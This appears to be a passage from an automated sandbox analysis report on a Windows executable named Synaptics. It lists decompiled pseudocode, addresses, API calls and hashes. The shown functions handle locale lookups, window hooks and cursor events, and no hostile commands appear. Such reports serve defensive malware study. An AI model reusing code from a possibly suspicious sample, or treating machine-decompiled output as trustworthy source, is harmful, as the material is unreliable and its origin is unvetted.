                                                                                                                                                                                          0x0040cbec
                                                                                                                                                                                          0x0040cbef
                                                                                                                                                                                          0x0040cbf4
                                                                                                                                                                                          0x0040cbf5
                                                                                                                                                                                          0x0040cbfa
                                                                                                                                                                                          0x0040cbfd
                                                                                                                                                                                          0x0040cc13
                                                                                                                                                                                          0x0040cc25
                                                                                                                                                                                          0x0040cc2f
                                                                                                                                                                                          0x0040cc3f
                                                                                                                                                                                          0x0040cc44
                                                                                                                                                                                          0x0040cc49
                                                                                                                                                                                          0x0040cc4e
                                                                                                                                                                                          0x0040cc4e
                                                                                                                                                                                          0x0040cc54
                                                                                                                                                                                          0x0040cc57
                                                                                                                                                                                          0x0040cc57
                                                                                                                                                                                          0x0040cc68
                                                                                                                                                                                          0x0040cc68
                                                                                                                                                                                          0x0040cc6f
                                                                                                                                                                                          0x0040cc72
                                                                                                                                                                                          0x0040cc75
                                                                                                                                                                                          0x0040cc82

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetThreadLocale.KERNEL32(?,00000000,0040CC83,?,?,00000000), ref: 0040CC04
                                                                                                                                                                                            • Part of subcall function 0040C964: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040C982
                                                                                                                                                                                          • GetThreadLocale.KERNEL32(00000000,00000004,00000000,0040CC83,?,?,00000000), ref: 0040CC34
                                                                                                                                                                                          • EnumCalendarInfoA.KERNEL32(Function_0000CB38,00000000,00000000,00000004), ref: 0040CC3F
                                                                                                                                                                                          • GetThreadLocale.KERNEL32(00000000,00000003,00000000,0040CC83,?,?,00000000), ref: 0040CC5D
                                                                                                                                                                                          • EnumCalendarInfoA.KERNEL32(Function_0000CB74,00000000,00000000,00000003), ref: 0040CC68
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Locale$InfoThread$CalendarEnum
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4102113445-0
                                                                                                                                                                                          • Opcode ID: 8248b440ae0a9565a755423cbf294169d4993abaad373ce74e76ef033f4fb80c
                                                                                                                                                                                          • Instruction ID: 1afeb0ae3c984d7c4f1a7fc68b04595db4598325ea28b3ac7f3617db3f710194
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8248b440ae0a9565a755423cbf294169d4993abaad373ce74e76ef033f4fb80c
                                                                                                                                                                                          • Instruction Fuzzy Hash: 70014270608204EBF701A7B5DD43F5E725CDB46B18F610737B900BA2C0D63CAE00826D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00458FB8 Relevance: 7.5, APIs: 5, Instructions: 25synchronizationthreadCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E00458FB8() {
				void* _t2;
				void* _t5;
				void* _t8;
				struct HHOOK__* _t10;

				if( *0x49ebd0 != 0) {
					_t10 =  *0x49ebd0; // 0x0
					UnhookWindowsHookEx(_t10);
				}
				 *0x49ebd0 = 0;
				if( *0x49ebd4 != 0) {
					_t2 =  *0x49ebcc; // 0x0
					SetEvent(_t2);
					if(GetCurrentThreadId() !=  *0x49ebc8) {
						_t8 =  *0x49ebd4; // 0x0
						WaitForSingleObject(_t8, 0xffffffff);
					}
					_t5 =  *0x49ebd4; // 0x0
					CloseHandle(_t5);
					 *0x49ebd4 = 0;
					return 0;
				}
				return 0;
			}







                                                                                                                                                                                          0x00458fbf
                                                                                                                                                                                          0x00458fc1
                                                                                                                                                                                          0x00458fc7
                                                                                                                                                                                          0x00458fc7
                                                                                                                                                                                          0x00458fce
                                                                                                                                                                                          0x00458fda
                                                                                                                                                                                          0x00458fdc
                                                                                                                                                                                          0x00458fe2
                                                                                                                                                                                          0x00458ff2
                                                                                                                                                                                          0x00458ff6
                                                                                                                                                                                          0x00458ffc
                                                                                                                                                                                          0x00458ffc
                                                                                                                                                                                          0x00459001
                                                                                                                                                                                          0x00459007
                                                                                                                                                                                          0x0045900e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0045900e
                                                                                                                                                                                          0x00459013

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • UnhookWindowsHookEx.USER32(00000000), ref: 00458FC7
                                                                                                                                                                                          • SetEvent.KERNEL32(00000000,0045B3C6,00000000,0045A473,?,?,0049ABD1,00000001,0045A533,?,?,?,0049ABD1), ref: 00458FE2
                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00458FE7
                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,0045B3C6,00000000,0045A473,?,?,0049ABD1,00000001,0045A533,?,?,?,0049ABD1), ref: 00458FFC
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,00000000,0045B3C6,00000000,0045A473,?,?,0049ABD1,00000001,0045A533,?,?,?,0049ABD1), ref: 00459007
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseCurrentEventHandleHookObjectSingleThreadUnhookWaitWindows
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2429646606-0
                                                                                                                                                                                          • Opcode ID: 7fd3c2e6dc8ae750e94a7f2d7be103522667448ec58a17d1e6ff86980fbe391f
                                                                                                                                                                                          • Instruction ID: 3bc59d0302d60dcdb639d85b4c22765180d6681b902288d708a5b48c4f0846c4
                                                                                                                                                                                          • Opcode Fuzzy Hash: 7fd3c2e6dc8ae750e94a7f2d7be103522667448ec58a17d1e6ff86980fbe391f
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9CF0ACB1905100EAC750EBBBED49A063395A724315F000A3BB112D71E1D73CF884CB1E
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00445974 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 287COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 89%
                                                                                                                                                                                          			E00445974(intOrPtr* __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi, void* __fp0) {
				intOrPtr* _v8;
				struct tagPOINT _v16;
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				struct tagMSG _v64;
				intOrPtr _v68;
				long _v72;
				char _v76;
				intOrPtr _t125;
				int _t126;
				int _t140;
				int _t147;
				intOrPtr* _t175;
				int _t186;
				void* _t191;
				intOrPtr* _t209;
				void* _t213;
				intOrPtr _t214;
				intOrPtr _t219;
				int _t232;
				intOrPtr _t233;
				int _t236;
				intOrPtr* _t242;
				intOrPtr _t262;
				intOrPtr _t278;
				intOrPtr _t289;
				int _t297;
				int _t300;
				int _t302;
				int _t303;
				int _t304;
				void* _t307;
				void* _t309;
				void* _t315;

				_t315 = __fp0;
				_t306 = _t307;
				_v76 = 0;
				_t242 = __edx;
				_v8 = __eax;
				_push(_t307);
				_push(0x445d4c);
				_push( *[fs:eax]);
				 *[fs:eax] = _t307 + 0xffffffb8;
				_t125 =  *__edx;
				_t309 = _t125 - 0x202;
				if(_t309 > 0) {
					_t126 = _t125 - 0x203;
					__eflags = _t126;
					if(__eflags == 0) {
						E00407A50( *((intOrPtr*)(__edx + 8)), 0,  &_v72);
						_t297 = E00444404(_v8,  &_v20,  &_v72, __eflags);
						__eflags = _t297;
						if(_t297 != 0) {
							__eflags =  *(_t297 + 4);
							if( *(_t297 + 4) != 0) {
								__eflags = _v20 - 2;
								if(_v20 == 2) {
									E004397DC();
									E0043BC7C( *(_t297 + 4), 0, 0, 1);
								}
							}
						}
						L47:
						if( *((short*)(_v8 + 0x32)) != 0) {
							 *((intOrPtr*)(_v8 + 0x30))();
						}
						L49:
						_pop(_t262);
						 *[fs:eax] = _t262;
						_push(0x445d53);
						return E004049C0( &_v76);
					}
					_t140 = _t126 - 0xae2d;
					__eflags = _t140;
					if(_t140 == 0) {
						 *((intOrPtr*)(_v8 + 0x30))();
						__eflags =  *(__edx + 0xc);
						if( *(__edx + 0xc) != 0) {
							goto L49;
						}
						_t300 =  *((intOrPtr*)( *_v8 + 4))();
						__eflags = _v20 - 0x12;
						if(_v20 != 0x12) {
							__eflags = _t300;
							if(_t300 == 0) {
								goto L49;
							}
							_t147 = _v20 - 2;
							__eflags = _t147;
							if(_t147 == 0) {
								L46:
								E0043A91C(_t300,  &_v36);
								 *((intOrPtr*)( *_v8))();
								_v36 = _v36 - _v36 -  *((intOrPtr*)(_t300 + 0x40)) + _v36 -  *((intOrPtr*)(_t300 + 0x40));
								_v32 = _v32 - _v32 -  *((intOrPtr*)(_t300 + 0x44)) + _v32 -  *((intOrPtr*)(_t300 + 0x44));
								_v28 = _v28 -  *((intOrPtr*)(_t300 + 0x48)) - _v28 - _v36 +  *((intOrPtr*)(_t300 + 0x48)) - _v28 - _v36;
								_v24 = _v24 -  *((intOrPtr*)(_t300 + 0x4c)) - _v24 - _v32 +  *((intOrPtr*)(_t300 + 0x4c)) - _v24 - _v32;
								E0043AF7C(_t300,  &_v76);
								E00404A14( *((intOrPtr*)(_t242 + 8)) + 0x38, _v76);
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								goto L49;
							}
							__eflags = _t147 != 0x12;
							if(_t147 != 0x12) {
								goto L49;
							}
							goto L46;
						}
						E004049C0( *((intOrPtr*)(__edx + 8)) + 0x38);
						goto L49;
					} else {
						__eflags = _t140 == 0x12;
						if(_t140 == 0x12) {
							_t175 =  *((intOrPtr*)(__edx + 8));
							__eflags =  *_t175 - 0xb00b;
							if( *_t175 == 0xb00b) {
								E0044585C(_v8,  *((intOrPtr*)(_t175 + 4)),  *((intOrPtr*)(__edx + 4)));
							}
						}
						goto L47;
					}
				}
				if(_t309 == 0) {
					__eflags =  *(_v8 + 0x60);
					if(__eflags != 0) {
						E004453A8(_v8, __eflags);
					} else {
						E00407A50( *((intOrPtr*)(__edx + 8)), 0,  &_v16);
						_t302 = E00444404(_v8,  &_v20,  &_v16, __eflags);
						__eflags = _t302;
						if(_t302 != 0) {
							__eflags = _v20 - 0x14;
							if(_v20 == 0x14) {
								_t295 =  *((intOrPtr*)(_t302 + 4));
								_t278 =  *0x44ff0c; // 0x44ff58
								_t186 = E00403D78( *((intOrPtr*)(_t302 + 4)), _t278);
								__eflags = _t186;
								if(_t186 == 0) {
									E0043AE9C(_t295, 0);
								} else {
									E00456FEC(_t295,  &_v20);
								}
							}
						}
					}
					goto L47;
				}
				_t191 = _t125 - 0x20;
				if(_t191 == 0) {
					GetCursorPos( &_v16);
					E0043AAC0( *((intOrPtr*)(_v8 + 0x14)),  &_v72,  &_v16);
					_v16.x = _v72;
					_v16.y = _v68;
					__eflags =  *((short*)(_t242 + 8)) - 1;
					if( *((short*)(_t242 + 8)) != 1) {
						goto L47;
					}
					__eflags = E00441704( *((intOrPtr*)(_v8 + 0x14))) -  *((intOrPtr*)(_t242 + 4));
					if(__eflags != 0) {
						goto L47;
					}
					__eflags = E00440234( *((intOrPtr*)(_v8 + 0x14)),  &_v72, __eflags);
					if(__eflags <= 0) {
						goto L47;
					}
					_t303 = E00444404(_v8,  &_v20,  &_v16, __eflags);
					__eflags = _t303;
					if(_t303 == 0) {
						goto L47;
					}
					__eflags = _v20 - 0x12;
					if(_v20 != 0x12) {
						goto L47;
					}
					_t209 =  *0x49de0c; // 0x49ebbc
					SetCursor(E004586EC( *_t209,  *((short*)(0x49bd44 + ( *( *((intOrPtr*)(_t303 + 0x14)) + 0x10) & 0x000000ff) * 2))));
					 *((intOrPtr*)(_t242 + 0xc)) = 1;
					goto L49;
				}
				_t213 = _t191 - 0x1e0;
				if(_t213 == 0) {
					_t214 = _v8;
					__eflags =  *(_t214 + 0x60);
					if( *(_t214 + 0x60) != 0) {
						E0044545C(_v8);
						E00407A50( *((intOrPtr*)(_t242 + 8)), 0,  &_v72);
						_t219 = _v8;
						 *(_t219 + 0x50) = _v72;
						 *((intOrPtr*)(_t219 + 0x54)) = _v68;
						E004458E4(_t306);
						E0044545C(_v8);
					}
					goto L47;
				}
				if(_t213 == 1) {
					E00407A50( *((intOrPtr*)(__edx + 8)), 0,  &_v16);
					_t256 =  &_v20;
					_t304 = E00444404(_v8,  &_v20,  &_v16, __eflags);
					__eflags = _t304;
					if(_t304 == 0) {
						goto L47;
					}
					__eflags = _v20 - 0x12;
					if(__eflags != 0) {
						__eflags = _v20 - 2;
						if(_v20 != 2) {
							goto L47;
						}
						_t232 = PeekMessageA( &_v64, E00441704( *((intOrPtr*)(_v8 + 0x14))), 0x203, 0x203, 0);
						__eflags = _t232;
						if(_t232 == 0) {
							_t289 =  *0x437498; // 0x4374e4
							_t236 = E00403D78( *((intOrPtr*)(_t304 + 4)), _t289);
							__eflags = _t236;
							if(_t236 != 0) {
								 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t304 + 4)))) + 0xc4))();
							}
						}
						_t233 =  *((intOrPtr*)(_t304 + 4));
						__eflags =  *((char*)(_t233 + 0x9b)) - 1;
						if( *((char*)(_t233 + 0x9b)) == 1) {
							__eflags =  *((char*)(_t233 + 0x5d)) - 1;
							if( *((char*)(_t233 + 0x5d)) == 1) {
								E0043B624(_t233, _t256 | 0xffffffff, 0, _t306, _t315);
							}
						}
						goto L49;
					}
					E00445348(_v8,  &_v16, _t304, __eflags);
				} else {
				}
			}








































                                                                                                                                                                                          0x00445974
                                                                                                                                                                                          0x00445975
                                                                                                                                                                                          0x0044597f
                                                                                                                                                                                          0x00445982
                                                                                                                                                                                          0x00445984
                                                                                                                                                                                          0x00445989
                                                                                                                                                                                          0x0044598a
                                                                                                                                                                                          0x0044598f
                                                                                                                                                                                          0x00445992
                                                                                                                                                                                          0x00445995
                                                                                                                                                                                          0x00445997
                                                                                                                                                                                          0x0044599c
                                                                                                                                                                                          0x004459c0
                                                                                                                                                                                          0x004459c0
                                                                                                                                                                                          0x004459c5
                                                                                                                                                                                          0x00445a46
                                                                                                                                                                                          0x00445a59
                                                                                                                                                                                          0x00445a5b
                                                                                                                                                                                          0x00445a5d
                                                                                                                                                                                          0x00445a63
                                                                                                                                                                                          0x00445a67
                                                                                                                                                                                          0x00445a6d
                                                                                                                                                                                          0x00445a71
                                                                                                                                                                                          0x00445a77
                                                                                                                                                                                          0x00445a85
                                                                                                                                                                                          0x00445a85
                                                                                                                                                                                          0x00445a71
                                                                                                                                                                                          0x00445a67
                                                                                                                                                                                          0x00445d21
                                                                                                                                                                                          0x00445d29
                                                                                                                                                                                          0x00445d33
                                                                                                                                                                                          0x00445d33
                                                                                                                                                                                          0x00445d36
                                                                                                                                                                                          0x00445d38
                                                                                                                                                                                          0x00445d3b
                                                                                                                                                                                          0x00445d3e
                                                                                                                                                                                          0x00445d4b
                                                                                                                                                                                          0x00445d4b
                                                                                                                                                                                          0x004459c7
                                                                                                                                                                                          0x004459c7
                                                                                                                                                                                          0x004459cc
                                                                                                                                                                                          0x00445c5f
                                                                                                                                                                                          0x00445c62
                                                                                                                                                                                          0x00445c66
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00445c7d
                                                                                                                                                                                          0x00445c7f
                                                                                                                                                                                          0x00445c83
                                                                                                                                                                                          0x00445c95
                                                                                                                                                                                          0x00445c97
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00445ca0
                                                                                                                                                                                          0x00445ca0
                                                                                                                                                                                          0x00445ca3
                                                                                                                                                                                          0x00445cae
                                                                                                                                                                                          0x00445cb3
                                                                                                                                                                                          0x00445cc2
                                                                                                                                                                                          0x00445ccc
                                                                                                                                                                                          0x00445cd7
                                                                                                                                                                                          0x00445ce7
                                                                                                                                                                                          0x00445cf7
                                                                                                                                                                                          0x00445cff
                                                                                                                                                                                          0x00445d0d
                                                                                                                                                                                          0x00445d1b
                                                                                                                                                                                          0x00445d1c
                                                                                                                                                                                          0x00445d1d
                                                                                                                                                                                          0x00445d1e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00445d1e
                                                                                                                                                                                          0x00445ca5
                                                                                                                                                                                          0x00445ca8
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00445ca8
                                                                                                                                                                                          0x00445c8b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004459d2
                                                                                                                                                                                          0x004459d2
                                                                                                                                                                                          0x004459d5
                                                                                                                                                                                          0x004459db
                                                                                                                                                                                          0x004459de
                                                                                                                                                                                          0x004459e4
                                                                                                                                                                                          0x004459f3
                                                                                                                                                                                          0x004459f3
                                                                                                                                                                                          0x004459e4
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004459d5
                                                                                                                                                                                          0x004459cc
                                                                                                                                                                                          0x0044599e
                                                                                                                                                                                          0x00445b42
                                                                                                                                                                                          0x00445b46
                                                                                                                                                                                          0x00445ba6
                                                                                                                                                                                          0x00445b48
                                                                                                                                                                                          0x00445b4e
                                                                                                                                                                                          0x00445b61
                                                                                                                                                                                          0x00445b63
                                                                                                                                                                                          0x00445b65
                                                                                                                                                                                          0x00445b6b
                                                                                                                                                                                          0x00445b6f
                                                                                                                                                                                          0x00445b75
                                                                                                                                                                                          0x00445b7a
                                                                                                                                                                                          0x00445b80
                                                                                                                                                                                          0x00445b85
                                                                                                                                                                                          0x00445b87
                                                                                                                                                                                          0x00445b99
                                                                                                                                                                                          0x00445b89
                                                                                                                                                                                          0x00445b8b
                                                                                                                                                                                          0x00445b8b
                                                                                                                                                                                          0x00445b87
                                                                                                                                                                                          0x00445b6f
                                                                                                                                                                                          0x00445b65
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00445b46
                                                                                                                                                                                          0x004459a4
                                                                                                                                                                                          0x004459a7
                                                                                                                                                                                          0x00445bb4
                                                                                                                                                                                          0x00445bc5
                                                                                                                                                                                          0x00445bcd
                                                                                                                                                                                          0x00445bd3
                                                                                                                                                                                          0x00445bd6
                                                                                                                                                                                          0x00445bdb
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00445bec
                                                                                                                                                                                          0x00445bef
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00445c00
                                                                                                                                                                                          0x00445c02
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00445c16
                                                                                                                                                                                          0x00445c18
                                                                                                                                                                                          0x00445c1a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00445c20
                                                                                                                                                                                          0x00445c24
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00445c39
                                                                                                                                                                                          0x00445c46
                                                                                                                                                                                          0x00445c4b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00445c4b
                                                                                                                                                                                          0x004459ad
                                                                                                                                                                                          0x004459b2
                                                                                                                                                                                          0x004459fd
                                                                                                                                                                                          0x00445a00
                                                                                                                                                                                          0x00445a04
                                                                                                                                                                                          0x00445a0d
                                                                                                                                                                                          0x00445a18
                                                                                                                                                                                          0x00445a1d
                                                                                                                                                                                          0x00445a23
                                                                                                                                                                                          0x00445a29
                                                                                                                                                                                          0x00445a2d
                                                                                                                                                                                          0x00445a36
                                                                                                                                                                                          0x00445a36
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00445a04
                                                                                                                                                                                          0x004459b5
                                                                                                                                                                                          0x00445a95
                                                                                                                                                                                          0x00445a9a
                                                                                                                                                                                          0x00445aa8
                                                                                                                                                                                          0x00445aaa
                                                                                                                                                                                          0x00445aac
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00445ab2
                                                                                                                                                                                          0x00445ab6
                                                                                                                                                                                          0x00445aca
                                                                                                                                                                                          0x00445ace
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00445af0
                                                                                                                                                                                          0x00445af5
                                                                                                                                                                                          0x00445af7
                                                                                                                                                                                          0x00445afc
                                                                                                                                                                                          0x00445b02
                                                                                                                                                                                          0x00445b07
                                                                                                                                                                                          0x00445b09
                                                                                                                                                                                          0x00445b10
                                                                                                                                                                                          0x00445b10
                                                                                                                                                                                          0x00445b09
                                                                                                                                                                                          0x00445b16
                                                                                                                                                                                          0x00445b19
                                                                                                                                                                                          0x00445b20
                                                                                                                                                                                          0x00445b26
                                                                                                                                                                                          0x00445b2a
                                                                                                                                                                                          0x00445b35
                                                                                                                                                                                          0x00445b35
                                                                                                                                                                                          0x00445b2a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00445b20
                                                                                                                                                                                          0x00445ac0
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004459bb

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetCursorPos.USER32(?), ref: 00445BB4
                                                                                                                                                                                          • SetCursor.USER32(00000000,?,00000000,00445D4C), ref: 00445C46
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Cursor
                                                                                                                                                                                          • String ID: tC
                                                                                                                                                                                          • API String ID: 3268636600-1085749316
                                                                                                                                                                                          • Opcode ID: a178da6c9b4bbc368baccb1c65472ba58289c6c91f01dbbabba44e50dbd88129
                                                                                                                                                                                          • Instruction ID: 446e4450e0cf9451a988a13874b671d4eb8b623e4d71601eaa952d46317be944
                                                                                                                                                                                          • Opcode Fuzzy Hash: a178da6c9b4bbc368baccb1c65472ba58289c6c91f01dbbabba44e50dbd88129
                                                                                                                                                                                          • Instruction Fuzzy Hash: A6C14E71E00609CFEF10DFA9C98999EB7B1AF48304F14856AE801AB356D738EE41CB59
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0045B640 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 282COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 84%
                                                                                                                                                                                          			E0045B640(char __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				struct tagPOINT _v32;
				char _v33;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v48;
				struct HWND__* _v52;
				intOrPtr _v56;
				char _v60;
				struct tagRECT _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				int _v88;
				int _v92;
				intOrPtr _v96;
				char _v100;
				struct tagRECT _v116;
				char _v132;
				intOrPtr _v136;
				char _v140;
				char _v144;
				char _v148;
				struct HWND__* _t130;
				struct HWND__* _t166;
				intOrPtr _t188;
				char _t194;
				intOrPtr _t218;
				intOrPtr _t222;
				void* _t238;
				intOrPtr* _t250;
				intOrPtr _t270;
				intOrPtr _t271;
				intOrPtr _t273;
				intOrPtr _t279;
				intOrPtr* _t306;
				intOrPtr _t307;
				void* _t314;

				_t313 = _t314;
				_push(__ebx);
				_push(__esi);
				_v144 = 0;
				_v148 = 0;
				asm("movsd");
				asm("movsd");
				_v8 = __eax;
				_t270 =  *0x451298; // 0x45129c
				E004053AC( &_v100, _t270);
				_t250 =  &_v8;
				_push(_t314);
				_push(0x45b9c6);
				_push( *[fs:eax]);
				 *[fs:eax] = _t314 + 0xffffff70;
				 *((char*)( *_t250 + 0x58)) = 0;
				if( *((char*)( *_t250 + 0x88)) == 0 ||  *((intOrPtr*)( *_t250 + 0x60)) == 0 || E004517CC() == 0 || E00458E30(E00439828( &_v16, 1)) !=  *((intOrPtr*)( *_t250 + 0x60))) {
					L23:
					_t130 = _v52;
					__eflags = _t130;
					if(_t130 <= 0) {
						E0045B3A8( *_t250);
					} else {
						E0045B1B0( *_t250, 0, _t130);
					}
					goto L26;
				} else {
					_v100 =  *((intOrPtr*)( *_t250 + 0x60));
					_v92 = _v16;
					_v88 = _v12;
					_v88 = _v88 + E0045B3E0();
					_v84 = E004581F4();
					_v80 =  *((intOrPtr*)( *_t250 + 0x5c));
					E0043A91C( *((intOrPtr*)( *_t250 + 0x60)),  &_v132);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t250 + 0x60)))) + 0x40))();
					_v32.x = 0;
					_v32.y = 0;
					_t306 =  *((intOrPtr*)( *((intOrPtr*)( *_t250 + 0x60)) + 0x30));
					_t320 = _t306;
					if(_t306 == 0) {
						_t307 =  *((intOrPtr*)( *_t250 + 0x60));
						_t279 =  *0x437498; // 0x4374e4
						_t166 = E00403D78(_t307, _t279);
						__eflags = _t166;
						if(_t166 != 0) {
							__eflags =  *(_t307 + 0x190);
							if( *(_t307 + 0x190) != 0) {
								ClientToScreen( *(_t307 + 0x190),  &_v32);
							}
						}
					} else {
						 *((intOrPtr*)( *_t306 + 0x40))();
					}
					OffsetRect( &_v76, _v32.x - _v24, _v32.y - _v20);
					E0043AAC0( *((intOrPtr*)( *_t250 + 0x60)),  &_v140,  &_v16);
					_v60 = _v140;
					_v56 = _v136;
					E00458DF8( *((intOrPtr*)( *_t250 + 0x60)),  &_v148);
					E0043809C(_v148,  &_v140,  &_v144, _t320);
					E00404A58( &_v44, _v144);
					_v52 = 0;
					_v48 =  *((intOrPtr*)( *_t250 + 0x74));
					_t188 =  *0x49be64; // 0x437a1c
					_v96 = _t188;
					_v40 = 0;
					_v33 = E0043C130( *((intOrPtr*)( *_t250 + 0x60)), 0, 0xb030,  &_v100) == 0;
					if(_v33 != 0 &&  *((short*)( *_t250 + 0x132)) != 0) {
						 *((intOrPtr*)( *_t250 + 0x130))( &_v100);
					}
					if(_v33 == 0 ||  *((intOrPtr*)( *_t250 + 0x60)) == 0) {
						_t194 = 0;
					} else {
						_t194 = 1;
					}
					_t285 =  *_t250;
					 *((char*)( *_t250 + 0x58)) = _t194;
					if( *((char*)( *_t250 + 0x58)) == 0) {
						goto L23;
					} else {
						_t327 = _v44;
						if(_v44 == 0) {
							goto L23;
						}
						E0045B534(_v96, _t285, _t313);
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t250 + 0x84)))) + 0x70))();
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t250 + 0x84)))) + 0xd8))( &_v116, _v40);
						OffsetRect( &_v116, _v92, _v88);
						if(E00403DE8( *((intOrPtr*)( *_t250 + 0x84)), _t327) != 0) {
							_t238 = E0045B594(_v44, _t250, 0xffc8, _t313) + 5;
							_v116.left = _v116.left - _t238;
							_v116.right = _v116.right - _t238;
						}
						E0043AA94( *((intOrPtr*)( *_t250 + 0x60)),  &_v140,  &_v76);
						_t218 =  *_t250;
						 *((intOrPtr*)(_t218 + 0x64)) = _v140;
						 *((intOrPtr*)(_t218 + 0x68)) = _v136;
						E0043AA94( *((intOrPtr*)( *_t250 + 0x60)),  &_v140,  &(_v76.right));
						_t222 =  *_t250;
						 *((intOrPtr*)(_t222 + 0x6c)) = _v140;
						 *((intOrPtr*)(_t222 + 0x70)) = _v136;
						E0043B11C( *((intOrPtr*)( *_t250 + 0x84)), _v80);
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t250 + 0x84)))) + 0xd4))(_v40);
						E00458F44(_v44);
						_t231 = _v52;
						if(_v52 <= 0) {
							E0045B1B0( *_t250, 1, _v48);
						} else {
